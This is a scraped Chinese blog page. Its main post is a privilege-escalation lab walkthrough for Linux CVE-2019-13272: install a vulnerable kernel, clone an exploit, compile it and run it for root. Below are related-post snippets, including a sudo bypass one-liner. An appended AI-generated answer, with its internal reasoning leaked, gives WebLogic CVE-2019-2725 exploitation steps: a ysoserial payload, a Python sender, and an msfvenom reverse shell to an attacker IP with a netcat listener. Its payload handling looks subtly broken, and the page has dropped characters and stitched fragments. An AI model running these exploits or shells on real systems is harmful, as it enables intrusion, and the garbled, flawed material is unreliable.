CVE-2019-13272提权实验

已于 2022-09-22 10:13:40 修改
阅读量1.1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 系统安全 ubuntu linux 安全性测试
于 2022-09-22 10:05:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lxlxxxlx/article/details/126986118
本文介绍如何利用CVE-2019-13272漏洞进行Linux内核版本低于5.1.17的本地提权攻击。通过安装特定版本的Linux内核、配置引导程序、克隆漏洞代码并编译运行,最终实现权限提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞类型:Linux本地提权

漏洞影响范围:Linux内核版本低于5.1.17

搭建环境

1.安装可以复现的内核版本
apt-cache search linux-image | grep "4.18.0.25"

 2.安装4.18.0-25
apt install linux-image-4.18.0-25-generic

3.查看是否安装成功
grep menuentry /boot/grub/grub.cfg 

 4.修改引导
vim /etc/default/grub

修改之前 i

 修改之后 :wq

 5.更新引导配置文件
update-grub

 6.安装git工具
sudo apt install git

实验实施 

7.将CVE-2019-13272克隆到桌面
git clone https://github.com/jas502n/CVE-2019-13272.git

 

 8.编译成2进制
gcc -s CVE-2019-13272.c -o pwned

 9.执行
./pwned

 查看结果,提权成功

【漏洞复现】Docker runC 容器逃逸漏洞(CVE-2019-5736)
李火火的安全圈
12-09 5823
2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在GitHub上公布。
linux mate 进程_漏洞预警|Linux内核本地漏洞分析(CVE201913272)
weixin_42346935的博客
11-25 555
漏洞描述近日,HSCERT监测发现Linux修复了一个本地内核漏洞,利用此漏洞,攻击者可将普通用户升为Root限。HSCERT研判此漏洞为严重漏洞,攻击者拿到本地限可以直接至root。漏洞分析当调用PTRACE_TRACEME时,ptrace_link()将获得对父级目标凭据的RCU引用,然后把该指针指向get_cred()函数。但是,对象struct cred的生存周...
CVE-2019-13272Linux本地内核
发哥微课堂
12-10 2171
介绍 在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问限 进程关系,父进程删除限并调用execve(可能允许攻击者控制)。 Linux执行PTRACE_TRACEME函数时,ptrace_link函数将获得对父进程凭据的RCU引用,然...
CVE-2019-13272 Linux kernel 限许可和访问控制问题漏洞
Sylon的博客
08-02 1636
漏洞简介: Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 Linuxkernel5.1.17之前版本中存在安全漏洞,该漏洞源于kernel/ptrace.c文件的 ptrace_link没有正确处理对凭证的记录。攻击者可利用该漏洞获取root访问限。 漏洞公告: 目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商 主页或...
CVE-2019-13272Linux本地内核
sagic的博客
11-22 477
Linux执行PTRACE_TRACEME函数时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数,但是,对象struct cred的生存周期规则不允许无条件的将RCU引用转换为稳定引用。PTRACE_TRACEME获取父进程的凭证,使其能够像父进程一样执行父进程能够执行的各种操作,如果恶意低限子进程使用PTRACE_TRACEME并且该子进程的父进程具有高限,子进程可获取其父进程的控制并且使用其父进程的限调用execve函数创建一个新的高限进程。
CVE-2019-13272 exp
09-02
kernel 5.1.17之前版本中存在安全漏洞,该漏洞源于kernel/ptrace.c文件的ptrace_link没有正确处理对凭证的记录。攻击者可利用该漏洞获取root访问限。由于  PTRACE_TRACEME允许的borked限,利用bug在概念上很有趣。对象生命周期处理问题可能会导致内存损坏,但它需要以精确的方式进行代码竞争。事实PTRACE_TRACEME证明,除了父进程之外,内核还记录了跟踪器的凭据。研究人员概述的方案涉及一个父进程,该进程创建一个子进程,这个子进程会创建子进程。第一个子进程使用命令pkexec(用于以root身份运行程序),第二个子进程运行PTRACE_T
CVE-2019-13272 Linux Kernel漏洞复现
墙角睡大觉的专栏
07-24 1502
日前,Linux官方发布一则通告, kernel 5.1.17之前版本中存在安全漏洞,该漏洞源于kernel/ptrace.c文件的ptrace_link没有正确处理对凭证的记录。攻击者可利用该漏洞获取root访问限。由于PTRACE_TRACEME允许的borked限,利用bug在概念上很有趣。对象生命周期处理问题可能会导致内存损坏,但它需要以精确的方式进行代码竞争。事实PTRACE_TRA...
Linux本地内核漏洞复现(CVE-2019-13272)
m0_48520508的博客
01-19 878
0x00简介 在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问限 进程关系,父进程删除限并调用execve可能允许攻击者控制。 0x01漏洞概述 Linux执行PTRACE_TRACEME函数时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数,但是,对象struct cred的生存周期规则不允许无条.
CVE-2019-14287LinuxSudo
发哥微课堂
12-10 472
介绍 CVE-2019-14287利用sudo命令漏洞,可在无需知道root密码的情况下切换到root身份。 范围 sudo 1.8.28之前所有的版本 复现 确认sudo的版本:sudo -V 利用:sudo -u#-1 vim,或者sudo -u#4294967295 vim 说明:sudo通过u参数来切换用户身份运行命令,可以跟用户名,也可以跟uid,uid前需要加...
DirtyCow漏洞复现(CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
linux漏洞类型,CVE-2019-13272
weixin_39560002的博客
05-13 252
// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)// Uses pkexec technique// ---// Original discovery and exploit author: Jann Horn// - https://bugs.chromium.org/p/project-zero/issue...
小白复现 | CVE-2019-13272Ubuntu本地
伏一
05-27 387
rm /var/lib/dpkg/lock#删除/var/lib/dpkg/lock目录。执行apt install linux-image-4.18.0-25-generic。cd ./CVE-2019-13272 需要进入到CVE-2019-13272目录下。uname -a#发现内核版本为4.15.0。执行apt install git。
春秋云镜 CVE-2019-13275
qq_22002773的博客
08-26 565
春秋云镜 CVE-2019-13275
linux内核最新版本2019,CVE-2019-13272Linux内核升漏洞警报
weixin_42492211的博客
04-29 191
最近,Linux正式修复了Linux内核CVE-2019-13272中的本地特漏洞。 通过此漏洞,攻击者可以将普通特用户升为root限。漏洞描述在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问限 进程关系,父进程删除限并调用exe...
cve2018 linux内核漏洞,CVE-2019-13272 Linux 内核 +cve-2018-18955
weixin_39652810的博客
05-09 211
Ubuntu 16.04.5 kernel 4.15.0-29-genericUbuntu 18.04.1 kernel 4.15.0-20-genericUbuntu 19.04 kernel 5.0.0-15-genericUbuntu Mate 18.04.2 kernel 4.18.0-15-genericLinux Mint 19 kernel 4.15.0-20-genericXubu...
【漏洞公告】CVE-2017-1000367:Sudo本地漏洞
bystarlight的博客
06-02 6281
原文链接 2017年5月30日,国外安全研究人员发现Linux环节下,可以通过sudo实现本地漏洞,漏洞编号为CVE-2017-1000367,该漏洞几乎影响了所有Linux系统。  具体详情如下:                                                                                 漏洞编号:   CVE
漏洞总结-linux漏洞
smart的博客
09-02 7133
漏洞总结-linux漏洞CVE-2019-13272CVE-2016-5195 CVE-2019-13272 此漏洞只能在使用了pkexec验证程序的系统中可以成功。 受影响的系统 Ubuntu 16.04.5 kernel 4.15.0-29-generic Ubuntu 18.04.1 kernel 4.15.0-20-generic Ubuntu 19.04 kernel 5.0.0-15-generic Ubuntu Mate 18.04.2 kernel 4.1
Linux内核漏洞(CVE-2019-13272
WFC1006848997的博客
01-12 607
Linux内核漏洞(CVE-2019-13272) 漏洞描述 kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问限 进程关系,父进程删除限并调用execve(可能允许攻击者控制)。 一个影响因素是对象寿命问题(也可能导致恐慌)。 另一个影响因素是将ptrace关系标记为特,这可以通过(例如)Polkit的pkexec帮助程序与PTRACE_TRACEME进行利用。获取root
weblogic(CVE-2019-2725)漏洞复现
最新发布
07-25
<think>首先,用户的问题是关于WebLogic CVE-2019-2725漏洞的复现步骤及利用方法。我需要基于供的引用内容来构建回答。 回顾系统级指令: - 所有行内数学表达式必须使用$...$格式,但这个问题似乎不涉及数学表达式,所以可能不需要。 - 独立公式使用$$...$$格式,但这里可能不适用。 - LaTeX语法正确:确保任何数学内容正确格式化。 - 使用中文回答:整个回答必须用中文。 - 生成相关问题:在回答结束后,生成相关问题。 - 引用标识:在引用的段落末尾添加引用标识,如[^1]。 用户意图:用户想复现WebLogic CVE-2019-2725漏洞,包括步骤和利用方法。 参考引用内容: - 引用[1]:CVE-2019-2725是WebLogic漏洞,通过/_async/AsyncResponseService路径传入恶意XML实现反序列化漏洞。 - 引用[2]:涉及其他XXE漏洞,但到了@xxlegend的分析,可能相关但不是直接针对CVE-2019-2725。 - 引用[3]:详细描述了CVE-2019-2725漏洞:影响wls9-async组件,路径为/_async/AsyncResponseService,通过恶意XML反序列化执行远程代码。影响版本包括WebLogic 10.3.6.0(在Java 7上验证),并到靶机环境搭建(Windows 7 SP1, WebLogic 10.3.6.0, Java 7)。 - 引用[4]:标题是CVE-2019-2725复现,包括环境搭建到getshell,到了启动WebLogic的步骤(./startWebLogic.sh)。 - 引用[5]:类似描述,路径/_async/AsyncResponseService,传入恶意XML导致反序列化漏洞。 关键点从引用中取: - 漏洞原理:在/_async/AsyncResponseService路径下,传入恶意XML数据,服务器在反序列化时执行恶意代码。 - 影响版本:WebLogic 10.3.6.0(特别在Java 7上),可能其他版本也受影响但未完全验证。 - 复现步骤: - 环境搭建:需要安装Java 7(如openjdk-7u75),安装WebLogic 10.3.6.0。 - 启动WebLogic:进入domain目录,运行./startWebLogic.sh。 - 利用方法:构造恶意XML请求发送到/_async/AsyncResponseService。 - 利用方法:具体如何构造恶意XML?引用中没有详细说明,但到反序列化漏洞,通常涉及发送包含恶意序列化对象的XML。 从引用[3]和[5]: - 漏洞利用:攻击者传入恶意的xml格式数据,服务器反序列化时执行代码。 - 在复现中,可能需要使用工具或脚本发送恶意请求。 标准复现步骤可能包括: 1. 搭建环境:安装Java 7和WebLogic 10.3.6.0。 2. 启动WebLogic服务。 3. 构造并发送恶意请求到http://target:port/_async/AsyncResponseService。 4. 验证命令执行,例如通过反弹shell或执行系统命令。 在引用[4]中到“从环境搭建到getshell”,所以应包括如何获取shell。 由于引用中没有详细PoC,我需要基于一般知识构建步骤。但必须引用供的引用内容。 回答结构: - 清晰、逐步解决问题。 - 使用中文。 - 在引用段落末尾添加引用标识。 大纲回答: 1. **漏洞概述**:简要描述CVE-2019-2725是什么。 2. **影响版本**:列出受影响的版本。 3. **复现前**:环境要求,如操作系统、Java版本、WebLogic版本。 4. **复现步骤**: - 步骤1: 搭建环境(安装Java和WebLogic)。 - 步骤2: 启动WebLogic服务。 - 步骤3: 构造恶意请求。 - 步骤4: 发送请求并验证漏洞利用。 5. **利用方法**:如何利用漏洞执行命令或获取shell。 6. **注意事项**:安全醒,仅用于学习目的。 生成相关问题:在回答结束后,添加3-5个相关问题。 添加引用:当直接引用或基于引用内容时,在末尾添加[^1]、[^3]等。 例如: - 根据引用[3],漏洞存在于wls9-async组件...[^3]。 - 引用[4]到启动WebLogic的步骤...[^4]。 具体步骤: - 从引用[3]:影响版本WebLogic 10.3.6.0,环境Windows 7或Linux,Java 7。 - 从引用[4]:启动命令./startWebLogic.sh。 - 利用:发送恶意XML到/_async/AsyncResponseService。 恶意XML构造:引用中没有细节,但常见方法是使用ysoserial等工具生成payload。 在回答中,我可以建议使用现有PoC脚本,但强调仅用于教育。 完整回答: - 开头:直接回答问题。 - 主体:分步骤。 - 结尾:相关问题。 生成相关问题: 1. CVE-2019-2725的漏洞原理是什么? 2. 如何防御WebLogic反序列化漏洞? 3. CVE-2019-2725与其他WebLogic漏洞有何区别? 4. 复现漏洞时常见问题及解决方法? 5. WebLogic漏洞的历史和演变? 确保语言自然。</think>### WebLogic CVE-2019-2725 漏洞复现步骤及利用方法 CVE-2019-2725 是 Oracle WebLogic Server 中的一个高危反序列化远程代码执行(RCE)漏洞。该漏洞存在于 `wls9-async` 组件中,攻击者可以通过向 `/_async/AsyncResponseService` 路径发送恶意 XML 数据,在服务器反序列化时执行任意代码,从而获取服务器控制。以下复现步骤基于参考引用内容,并针对典型环境(如 Linux 系统)进行说明。**注意:本内容仅用于安全研究和教育目的,严禁用于非法测试。复现漏洞需在隔离的实验室环境(如虚拟机)中进行,以避免对真实系统造成危害。** #### 漏洞概述 - **原理**:漏洞源于 WebLogic 的异步通信服务(`wls9-async`),在处理 XML 格式的请求时,未正确验证输入数据。攻击者构造恶意 XML 数据,其中包含序列化的 Java 对象,服务器在反序列化时会执行嵌入的恶意代码,导致远程命令执行。这允许攻击者执行系统命令、上传文件或获取反向 shell[^3][^5]。 - **影响版本**: - Oracle WebLogic Server 10.3.6.0(已验证在 Java 7 环境)[^3]。 - 其他潜在受影响版本:WebLogic 12.1.3.0(但未完全验证)[^3]。 - **环境要求**: - 操作系统:Linux(如 Ubuntu)或 Windows(如 Windows 7 SP1),推荐使用 Linux 便于复现。 - Java 版本:必须使用 Java 7(如 OpenJDK 7u75),因为高版本 Java 可能修补相关漏洞[^3][^4]。 - WebLogic 版本:WebLogic 10.3.6.0(可从 Oracle 官网下载试用版)。 #### 复现步骤(以 Linux 环境为例) 以下是完整的复现流程,包括环境搭建、漏洞利用和验证。假设您已安装虚拟机(如 VirtualBox)和基础工具(如 curl 或 Python)。 1. **环境搭建** 首先,安装依赖软件并配置 WebLogic。 - **步骤 1.1: 安装 Java 7** 下载并安装 OpenJDK 7(例如,openjdk-7u75-b13-linux-x64)。在终端执行: ```bash wget https://download.java.net/openjdk/jdk7u75/ri/openjdk-7u75-b13-linux-x64-18_dec_2014.tar.gz tar -xzvf openjdk-7u75-b13-linux-x64-18_dec_2014.tar.gz sudo mv openjdk1.7.0_75 /usr/lib/jvm/ sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/openjdk1.7.0_75/bin/java 1 sudo update-alternatives --config java # 选择 Java 7 java -version # 验证输出应为 "java version "1.7.0_75"" ``` 此步骤确保使用易受攻击的 Java 版本[^3][^4]。 - **步骤 1.2: 安装 WebLogic 10.3.6.0** 下载 WebLogic 安装包(如 `wls1036_generic.jar`),运行安装向导: ```bash java -jar wls1036_generic.jar ``` 在安装过程中: - 创建新域(例如,`peak_domain`)。 - 设置管理员账号(如用户名 `weblogic`,密码 `password1`)。 - 完成后,记录域目录路径(如 `/home/user/Oracle/Middleware/user_projects/domains/peak_domain`)[^4]。 - **步骤 1.3: 启动 WebLogic 服务** 进入域目录并启动服务: ```bash cd /home/user/Oracle/Middleware/user_projects/domains/peak_domain ./startWebLogic.sh # 等待输出 "Server started in RUNNING mode" ``` 服务默认监听端口 7001。访问 `http://localhost:7001/console` 验证 WebLogic 控制台是否正常(使用设置的管理员账号登录)[^4]。 2. **漏洞利用:构造并发送恶意请求** 漏洞利用的核心是向 `/_async/AsyncResponseService` 端点发送恶意 XML 数据。这里使用 Python 脚本生成并发送 payload,实现命令执行(如启动计算器或反弹 shell)。 - **步骤 2.1: 准备恶意 XML payload** 利用反序列化工具(如 ysoserial)生成 payload。首先,下载 ysoserial: ```bash wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar ``` 生成一个执行系统命令的 payload(例如,启动 `gnome-calculator` 作为 PoC): ```bash java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections1 'gnome-calculator' > payload.xml ``` 此 payload 利用了 Commons Collections 库的反序列化缺陷。将 `payload.xml` 内容封装为 SOAP 格式的 XML 请求[^3][^5]。 - **步骤 2.2: 发送恶意请求** 使用 curl 或 Python 脚本发送 payload 到 WebLogic。示例 Python 脚本(`exploit.py`): ```python import requests url = "http://localhost:7001/_async/AsyncResponseService" # 替换为目标 IP 和端口 headers = {"Content-Type": "text/xml"} with open("payload.xml", "rb") as f: payload = f.read() response = requests.post(url, data=payload, headers=headers) if response.status_code == 202: # 接受处理状态码 print("漏洞利用成功!检查目标系统是否执行命令(如计算器弹出)。") else: print("利用失败,状态码:", response.status_code) ``` 运行脚本: ```bash python exploit.py ``` 如果成功,目标服务器将执行 `gnome-calculator`(或其他命令)。这表明远程代码执行已生效[^3][^5]。 - **步骤 2.3: 获取反向 shell(高级利用)** 为获取完整控制,可构造 payload 反弹 shell。例如,使用 msfvenom 生成 reverse shell payload: ```bash msfvenom -p java/shell_reverse_tcp LHOST=攻击者IP LPORT=4444 -f raw > shell.xml ``` 在攻击机启动监听: ```bash nc -lvnp 4444 ``` 修改 `exploit.py` 发送 `shell.xml`。成功后,攻击机将获得目标服务器的 shell 会话[^5]。 3. **验证漏洞** - **成功指标**:命令执行后,检查 WebLogic 服务器: - 弹出计算器(GUI 环境)。 - 或在 shell 会话中执行 `id` 或 `whoami` 命令,验证限(通常为 WebLogic 进程用户)。 - **日志检查**:WebLogic 日志(位于域目录的 `servers/AdminServer/logs`)可能显示反序列化错误或异常,但漏洞利用通常不留明显痕迹[^3]。 #### 注意事项 - **安全警告**:此漏洞允许完全接管服务器。复现时务必使用隔离环境,避免暴露到公网。参考引用强调,所有操作应仅用于合法学习和测试[^1][^3][^5]。 - **常见问题**: - **失败原因**:Java 版本不匹配(必须 Java 7)、WebLogic 配置错误或 payload 兼容性问题。建议使用已验证的 ysoserial payload。 - **防御建议**:修补漏洞(Oracle 官方补丁)、禁用 `wls9-async` 组件或升级到最新 WebLogic 版本。 - **参考工具**: - ysoserial:生成反序列化 payload。 - Burp Suite:手动构造和发送恶意请求。 - Metasploit:供自动化利用模块(搜索 `exploit/multi/misc/weblogic_deserialize_asyncresponseservice`)。 通过以上步骤,您可成功复现 CVE-2019-2725 漏洞并理解其利用机制。复现过程需熟悉基础命令行和网络工具,如有疑问,可参考漏洞分析文章加深理解[^1][^2][^5]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值